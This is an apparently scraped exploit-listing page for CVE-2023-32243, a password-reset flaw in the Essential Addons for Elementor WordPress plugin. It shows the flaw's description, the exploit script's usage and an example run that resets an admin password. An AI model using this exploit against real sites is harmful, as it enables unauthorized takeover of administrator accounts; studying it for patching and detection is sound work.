Exploit for CVE-2023-32243 exploit

11 months ago 99
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=50225054-BCCC-57A2-8C29-5318E213BD05 # CVE-2023-32243. Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation Info --- The plugin does not validate the password reset key, which could allow unauthenticated attackers to reset arbitrary account's password to anything they want, by knowing the related email or username, gaining access to them Exploit Details ---- https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites/ Usage ---- ``` usage: exploit.py [-h] -u URL -p PASSWORD options: -h, --help show this help message and exit -u URL, --url URL URL of the WordPress site -p PASSWORD, --password PASSWORD Password to set for the selected username ``` Example ---- ``` python3 exploit.py --url http://wordpress.lan --password "adminadmin2" Please select a username: 1. admin > 1 Nonce value: f010bc2ac9 All Set! You can now login using the following credentials: Username: admin Password: adminadmin2 Admin Url: http://wordpress.lan/wp-admin/ ```
Read Entire Article